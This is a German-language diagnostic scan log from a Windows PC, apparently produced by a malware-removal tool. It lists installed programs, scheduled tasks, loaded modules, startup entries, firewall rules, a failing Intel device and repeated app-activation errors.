Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.50727 (HKLM-x32\...\{22154f09-719a-4619-bb71-5b3356999fbf}) (Version: 11.0.50727.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Minecraft (HKLM-x32\...\{1C16BCA3-EBC1-49F6-8623-8FBFB9CCC872}) (Version: 1.0.3.0 - Mojang)
Mozilla Firefox 41.0.2 (x86 de) (HKLM-x32\...\Mozilla Firefox 41.0.2 (x86 de)) (Version: 41.0.2 - Mozilla)
Notepad++ (HKLM-x32\...\Notepad++) (Version: 6.9.1 - Notepad++ Team)
OpenOffice 4.1.1 (HKLM-x32\...\{ACD0FFF9-6B35-43C1-82DB-9FF6990E8602}) (Version: 4.11.9775 - Apache Software Foundation)
Origin (HKLM-x32\...\Origin) (Version: 9.5.12.2862 - Electronic Arts, Inc.)
PlaysTV (HKLM-x32\...\PlaysTV) (Version: 1.9.2-r111395-release - Plays.tv, LLC)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.994 - Even Balance, Inc.)
Raptr (HKLM-x32\...\Raptr) (Version: 5.1.2-r111396-release - Raptr, Inc)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 7.41.216.2011 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7535 - Realtek Semiconductor Corp.)
Skype Click to Call (HKLM-x32\...\{6D1221A9-17BF-4EC0-81F2-27D30EC30701}) (Version: 8.0.0.9103 - Microsoft Corporation)
Skype™ 7.21 (HKLM-x32\...\{FC965A47-4839-40CA-B618-18F486F042C6}) (Version: 7.21.100 - Skype Technologies S.A.)
Spotify (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\Spotify) (Version: 1.0.25.127.g58007b4c - Spotify AB)
StarCraft II (HKLM-x32\...\StarCraft II) (Version:  - Blizzard Entertainment)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.56083 - TeamViewer)
Unity Web Player (HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)
Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies)
Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.)
WinRAR 5.30 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.30.0 - win.rar GmbH)
World of Warcraft (HKLM-x32\...\World of Warcraft) (Version:  - Blizzard Entertainment)
World of Warcraft Public Test (HKLM-x32\...\World of Warcraft Public Test) (Version:  - Blizzard Entertainment)

==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

CustomCLSID: HKU\S-1-5-21-2630849102-760198568-3561441068-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412_1\FileCoAuth.exe (Microsoft Corporation)

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {11AE36CB-2A03-4DDC-A890-64628F30C9EF} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {17A4B275-EE49-4865-B9C9-53C2BB6B071F} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2016-03-07] (Hewlett-Packard)
Task: {2798CFEA-C567-4F10-8381-056656C30F47} - System32\Tasks\{851C45EB-4FE8-42FB-AFE6-FF991A964C5B} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {2CF52B04-7B08-4ACC-A970-6B3FD69FDC4A} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {377F221C-47EF-4C4D-93AC-708AC0ABB8B9} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => C:\Windows\ehome\ehPrivJob.exe
Task: {396A2551-0AB1-4FE9-BED9-F057CF29CB2B} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {48BCCA7F-E9A5-4128-8E37-AE55AEFECA8E} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => C:\Windows\ehome\mcupdate.exe
Task: {4F5C5854-312A-4A24-ABDF-3C644FC226F6} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {5A0191B5-5F68-4856-A343-DE3E25F99E5C} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => C:\Windows\ehome\ehPrivJob.exe
Task: {6152FDF3-58E5-498E-9CF3-A9D7D429B80B} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2016-03-11] (Piriform Ltd)
Task: {6EEAF9D3-CC5F-4E6C-AC88-9DE7780771E9} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {70BAF52C-C324-4265-94E7-6336FBE7590E} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-04-15] (Microsoft Corporation)
Task: {732820F9-0FDC-4FC9-963F-25C3A2BA94B2} - System32\Tasks\AVGPCTuneUp_Task_BkGndMaintenance => C:\Program Files (x86)\AVG\AVG PC TuneUp\tuscanx.exe [2016-03-29] (AVG Technologies CZ, s.r.o.)
Task: {7E44129D-761D-427B-8DC4-16D8E966F159} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {8D3866F9-766B-48DB-A578-5C21B7EA69AC} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {92C84F68-7305-4AC7-833F-BA67477E36CA} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => C:\Windows\ehome\ehPrivJob.exe
Task: {A1AE644B-6680-4D57-99C4-1FE32BE13D5B} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
Task: {A65B8F6D-A713-47F9-BB7D-735498D1C450} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-07-29] (Google Inc.)
Task: {AE71EAE0-A9B0-45EB-AC26-7137D2C92B00} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => C:\Windows\ehome\mcupdate.exe
Task: {B1CD5B0C-693D-4B7C-8323-C9FD491903EE} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => C:\Windows\ehome\ehPrivJob.exe
Task: {BAAAEC1C-119B-4660-A593-B5D97C4B8E6F} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe
Task: {BCE21238-B804-496C-973D-49332B4BC6AE} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {C5625BD7-9D7F-45B0-8F71-CA915B4E0814} - System32\Tasks\Microsoft\Windows Embedded\Embedded App Launcher Startup => C:\Windows\system32\embeddedapplauncher.exe [2016-02-13] (Microsoft Corporation)
Task: {C6EA2FDA-643C-4333-A577-9FC6BC26272E} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => C:\Windows\ehome\mcupdate.exe
Task: {CB660142-85F0-4F75-BF5F-CB86DACA85E2} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => C:\Windows\ehome\ehPrivJob.exe
Task: {CB6A3A7A-6827-4E97-90B5-33E9ED0C759B} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {D128CD79-AA9A-4682-9905-F14DB406D448} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => C:\Windows\ehome\ehPrivJob.exe
Task: {DADEF66A-B64F-42F7-84E8-039E9C3B9E69} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => C:\Windows\ehome\ehrec.exe
Task: {DC4BE421-18AF-4C9E-9FFF-D48C8C6478E4} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => C:\Windows\ehome\ehPrivJob.exe
Task: {E653ACD2-7CC0-4B7B-9D01-730295A1F3D8} - System32\Tasks\Apple\AppleSoftwareUpdate => C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe [2016-02-23] (Apple Inc.)
Task: {E6589D93-3FA5-49AF-9B33-493ACA29767E} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => C:\Windows\ehome\ehPrivJob.exe
Task: {E7892EEF-4D43-4930-B9D0-5C8888186A36} - System32\Tasks\{812DDBC9-50E6-4521-ABD6-CA97EAF205AD} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&amp;ver=7.7.0.103&amp;LastError=-3
Task: {E95F50C4-F888-4E6C-BAC1-02665CC2F866} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Report => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSFReport.exe [2016-04-06] (Hewlett-Packard)
Task: {EE3BDAA5-ED46-440A-8650-A160485AA160} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => C:\Windows\ehome\ehPrivJob.exe

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Verknüpfungen =============================

(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)

==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============

2016-03-18 22:56 - 2016-03-18 22:56 - 00092472 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2016-03-18 22:56 - 2016-03-18 22:56 - 01329936 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2015-08-01 20:56 - 2015-08-02 16:03 - 00076152 _____ () C:\WINDOWS\SysWOW64\PnkBstrA.exe
2015-10-30 09:18 - 2015-10-30 09:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-04-25 13:35 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2016-04-24 22:33 - 2016-04-24 22:34 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2016-04-25 13:35 - 2016-03-29 12:20 - 02656952 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-04-24 21:59 - 2016-04-24 21:59 - 00959176 _____ () C:\Users\Harun\AppData\Local\Microsoft\OneDrive\17.3.6386.0412_1\amd64\ClientTelemetry.dll
2016-02-13 19:02 - 2016-02-13 19:02 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2016-04-25 13:35 - 2016-04-02 05:25 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-04-25 13:35 - 2016-04-02 05:03 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-04-25 13:35 - 2016-04-02 04:58 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-04-25 13:35 - 2016-04-02 04:59 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-04-25 13:35 - 2016-04-02 05:02 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-04-24 22:33 - 2016-04-24 22:34 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.15.20002.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-04-19 13:12 - 2016-04-06 12:04 - 01675928 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libglesv2.dll
2016-04-19 13:12 - 2016-04-06 12:04 - 00086168 _____ () C:\Program Files (x86)\Google\Chrome\Application\49.0.2623.112\libegl.dll
2016-04-10 17:32 - 2016-04-10 17:31 - 40500224 _____ () C:\Program Files (x86)\AVG\UiDll\2171\libcef.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)


==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2009-06-10 23:00 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-2630849102-760198568-3561441068-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Harun\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper
DNS Servers: 192.168.178.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKLM\...\StartupApproved\Run: => "iTunesHelper"
HKLM\...\StartupApproved\Run: => "StartCN"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "Raptr"
HKLM\...\StartupApproved\Run32: => "PlaysTV"
HKLM\...\StartupApproved\Run32: => "mbot_en_037050261"
HKLM\...\StartupApproved\Run32: => "win_en_77"
HKLM\...\StartupApproved\Run32: => "Wondershare Helper Compact.exe"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\StartupFolder: => "Xfire2.bat"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "OneDrive"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Spotify Web Helper"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "Steam"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "BingSvc"
HKU\S-1-5-21-2630849102-760198568-3561441068-1000\...\StartupApproved\Run: => "CCleaner Monitoring"

==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [UDP Query User{75F25FBD-CA6B-4054-943E-3758A259E2A5}A:\starcraft ii\versions\base42253\sc2_x64.exe] => (Allow) A:\starcraft ii\versions\base42253\sc2_x64.exe
FirewallRules: [TCP Query User{4FFD39CB-845E-41AF-A4A4-3D9412FEC378}A:\starcraft ii\versions\base42253\sc2_x64.exe] => (Allow) A:\starcraft ii\versions\base42253\sc2_x64.exe
FirewallRules: [{4C2E216B-3F5D-4DC6-B3E5-D777C482C8FC}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{302047B4-E0E7-4AE6-96B2-BDD4D5C4307D}] => (Allow) A:\iTunes.exe
FirewallRules: [{16CB5095-C60B-4A9A-AF40-FFF4FF667E4A}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{3C2F26B4-E13F-4E26-B187-60BDB19D986F}] => (Allow) C:\Program Files (x86)\Raptr Inc\PlaysTV\playstv.exe
FirewallRules: [{48F1500B-0F5A-488B-A6C2-4E310ADB9290}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{1FB21FF6-AB11-484B-8ADB-638F34153E99}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{AA0EA854-6DFB-4B81-8D5C-1056DC11E33C}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{19645894-3D5C-4408-A5F6-9B66DFB1DC9F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [UDP Query User{97AB465D-9EFC-47C7-BF64-913694D80FCA}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [TCP Query User{6EE9145F-17C0-43E7-87FF-67A36AF241E7}C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Allow) C:\program files (x86)\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{BB735679-47B3-409A-8738-29CA284AA409}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{823DAAEE-6ABF-4B05-BDB9-383B0D21FE83}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Allow) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [UDP Query User{D00ED757-645B-41E0-BFF0-EFEEBB5995ED}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{821D4B6B-A2AB-4689-9063-D6F980672A77}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Block) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [UDP Query User{6A8D13A6-8290-4176-8559-5F33EC7ED562}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [TCP Query User{B4514ECE-E440-46E1-B1D2-26717681B1E0}C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe] => (Block) C:\program files (x86)\java\jre1.8.0_51\bin\javaw.exe
FirewallRules: [{085256D1-31AD-4037-8168-D364B01EBC13}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{E35884C9-26D9-4EAD-9D40-2E56C22777E7}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{29E298B7-7591-4640-AD04-9B5F1E53CBA1}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{277B4264-74AC-4424-97C4-6D6C0796EF8F}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [UDP Query User{80C05AF5-C686-4759-B28B-9A8FEF736C4C}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [TCP Query User{7198F59F-7EF5-4103-881C-0D8F7DF8701B}A:\program files (x86)\origin games\bfh\bfh.exe] => (Allow) A:\program files (x86)\origin games\bfh\bfh.exe
FirewallRules: [{F3E54CC2-1149-412B-936A-B7B404D80F42}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [{D0D01B7E-5143-44D9-AC6A-CC67DA9DC212}] => (Allow) A:\Program Files (x86)\Origin Games\BFH\BFHWebHelper.exe
FirewallRules: [{6B0C9A6B-F6E7-4A35-9EB7-6D1B664D401A}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{4EF4C32F-BB8F-4765-B97F-A9006BD42435}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{6E5BD0D9-0928-42F6-B0CC-6822D671F49E}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{AFF1319A-917A-4107-A1B8-16C203B38CE3}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{5AAA1481-9998-4568-8A9B-D962D4EC35DF}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{54390D52-B160-4427-922D-9E33F5445695}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{98D524D2-5FAB-47A1-8D96-609F4621339A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{EAA7D367-AABF-426D-BB3F-EF9A70667017}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4.exe
FirewallRules: [{F2EF9A12-86E9-472C-A3D4-94A1F9A17C0A}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{1064F6A1-CED6-4E5B-9557-D4C9CE2276C3}] => (Allow) A:\Program Files (x86)\Origin Games\Battlefield 4\bf4_x86.exe
FirewallRules: [{88748628-27A1-4BE3-A512-B5BEDB3F0CBC}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{9074E1C2-24F4-4C85-931B-F7C36B46E9F0}] => (Allow) A:\Steam\Steam.exe
FirewallRules: [{79EA3DA0-E438-4DF1-B00E-395F81892905}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [UDP Query User{4FE86D86-4126-4CAC-B0C6-0964BDDF3F14}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [TCP Query User{52257645-0630-45E9-A1FB-39934F6C2678}C:\users\harun\appdata\roaming\spotify\spotify.exe] => (Allow) C:\users\harun\appdata\roaming\spotify\spotify.exe
FirewallRules: [{DA65680E-6E44-4201-B745-F198AC8E3393}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{632E65A2-F35B-4491-A894-4259D389B688}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{3E4AF0F9-5D5F-47A5-89C3-8483E1874B3C}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{29D5CD28-05A0-4A40-8780-02DADE66DA50}] => (Allow) A:\Steam\steamapps\common\Counter-Strike Source\hl2.exe
FirewallRules: [{04697792-0727-44EB-82BB-90E6B7E101BA}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{B3BD4173-9D91-493E-9FA0-7BCAB414DBB8}] => (Allow) A:\Battle.net\Battle.net.exe
FirewallRules: [{8C66906E-1DAA-4F0B-88E4-E0163476C022}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [{EF9BA6B0-D956-4E04-A56D-B2D010471C6C}] => (Allow) A:\Steam\bin\steamwebhelper.exe
FirewallRules: [TCP Query User{37A10C6A-0185-441C-A38D-4A5B08F308AC}C:\users\harun\desktop\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Block) C:\users\harun\desktop\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [UDP Query User{2EBFBB0E-5E9D-40CA-9B32-BD1E39208E0E}C:\users\harun\desktop\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe] => (Block) C:\users\harun\desktop\minecraft\runtime\jre-x64\1.8.0_25\bin\javaw.exe
FirewallRules: [{4E601608-38A8-4B28-872A-C7E488722DE4}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{E72BB71B-B6C5-4389-8DA9-BA743063712D}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer.exe
FirewallRules: [{78D48AD7-6B0C-455F-8F33-DC767F98C969}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [{5DFD7590-3830-4848-A3E6-229508EDA35F}] => (Allow) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
FirewallRules: [TCP Query User{9C11CB82-2743-4DD7-B957-4E58D249FBEE}C:\program files\java\jre1.8.0_91\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_91\bin\java.exe
FirewallRules: [UDP Query User{DCA52BCB-249D-41AD-9A94-1BDB1A4203D1}C:\program files\java\jre1.8.0_91\bin\java.exe] => (Allow) C:\program files\java\jre1.8.0_91\bin\java.exe
FirewallRules: [TCP Query User{5F7F129D-D226-4B1D-A981-E9B9FFDC9C54}C:\program files\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_91\bin\javaw.exe
FirewallRules: [UDP Query User{035A9544-6CB0-45BC-9B3E-C7C6FBB268ED}C:\program files\java\jre1.8.0_91\bin\javaw.exe] => (Block) C:\program files\java\jre1.8.0_91\bin\javaw.exe

==================== Wiederherstellungspunkte =========================

ACHTUNG: Systemwiederherstellung ist deaktiviert

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Intel(R) Management Engine Interface
Description: Intel(R) Management Engine Interface
Class Guid: {4d36e97d-e325-11ce-bfc1-08002be10318}
Manufacturer: Intel
Service: MEIx64
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (04/28/2016 09:27:48 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HARUN-PC)
Description: Bei der Aktivierung der App „Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2147023174. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/27/2016 07:02:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HARUN-PC)
Description: Bei der Aktivierung der App „Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2147023174. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/26/2016 09:23:56 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HARUN-PC)
Description: Bei der Aktivierung der App „Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2147023174. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/25/2016 02:22:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HARUN-PC)
Description: Bei der Aktivierung der App „Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2147023174. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

Error: (04/25/2016 01:52:54 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: HARUN-PC)
Description: Bei der Aktivierung der App „Microsoft.Messaging_8wekyb3d8bbwe!ppleae38af2e007f4358a809ac99a64a67c1“ ist folgender Fehler aufgetreten: -2147023174. Weitere Informationen finden Sie im Protokoll „Microsoft-Windows-TWinUI/Betriebsbereit“.

